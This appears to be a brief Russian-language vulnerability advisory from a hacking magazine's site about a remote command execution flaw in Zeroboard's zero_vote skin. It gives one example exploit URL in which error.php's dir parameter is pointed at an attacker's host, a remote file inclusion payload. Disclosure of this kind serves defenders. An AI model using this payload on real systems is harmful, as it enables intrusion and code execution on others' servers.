Рекомендуем почитать:


Хакер #311. Сетевые протоколы под микроскопом
Программа: Zeroboard
Уязвимость в Zeroboard в zero_vote теме позволяет удаленному пользователю выполнить произвольные команды на целевой системе.
Пример:
http://[target]/zeroboard/skin/zero_vote/ error.php?dir=http://[attacker]